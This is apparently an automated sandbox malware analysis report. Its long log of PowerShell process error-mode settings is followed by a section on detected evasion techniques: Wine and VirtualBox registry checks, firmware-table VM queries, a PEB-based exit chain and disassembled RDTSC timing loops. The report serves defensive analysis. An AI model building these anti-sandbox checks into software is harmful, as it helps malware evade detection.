Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD028B second address: FD028F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD028F second address: FD029C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD029C second address: FD02A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1148BDA second address: 1148BF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jmp 00007F626D6E9A6Bh 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1148BF1 second address: 1148BF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1147B7D second address: 1147BB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F626D6E9A77h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F626D6E9A78h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1147BB6 second address: 1147BBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1147D15 second address: 1147D19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1147D19 second address: 1147D29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F626C9C9A26h 0x0000000a jng 00007F626C9C9A26h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1147E65 second address: 1147E81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007F626D6E9A73h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1147E81 second address: 1147E89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1148031 second address: 114804D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F626D6E9A6Bh 0x0000000b push esi 0x0000000c jl 00007F626D6E9A6Eh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1148304 second address: 114830A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114830A second address: 1148316 instructions: 0x00000000 rdtsc 0x00000002 js 00007F626D6E9A66h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1148316 second address: 114831C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11484B4 second address: 11484BA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114B3A3 second address: 114B466 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F626C9C9A37h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov edx, dword ptr [ebp+122D3734h] 0x00000012 push 00000000h 0x00000014 xor dword ptr [ebp+122D2870h], edx 0x0000001a movzx ecx, cx 0x0000001d push 1AD12982h 0x00000022 jmp 00007F626C9C9A33h 0x00000027 xor dword ptr [esp], 1AD12902h 0x0000002e push 00000003h 0x00000030 push 00000000h 0x00000032 push edx 0x00000033 call 00007F626C9C9A28h 0x00000038 pop edx 0x00000039 mov dword ptr [esp+04h], edx 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc edx 0x00000046 push edx 0x00000047 ret 0x00000048 pop edx 0x00000049 ret 0x0000004a and edx, 59ED3F1Ah 0x00000050 push 00000000h 0x00000052 sbb esi, 45C6CA36h 0x00000058 push 00000003h 0x0000005a jmp 00007F626C9C9A35h 0x0000005f call 00007F626C9C9A29h 0x00000064 push ebx 0x00000065 push edx 0x00000066 jnc 00007F626C9C9A26h 0x0000006c pop edx 0x0000006d pop ebx 0x0000006e push eax 0x0000006f jng 00007F626C9C9A32h 0x00000075 mov eax, dword ptr [esp+04h] 0x00000079 push eax 0x0000007a push edx 0x0000007b push esi 0x0000007c push edx 0x0000007d pop edx 0x0000007e pop esi 0x0000007f rdtsc
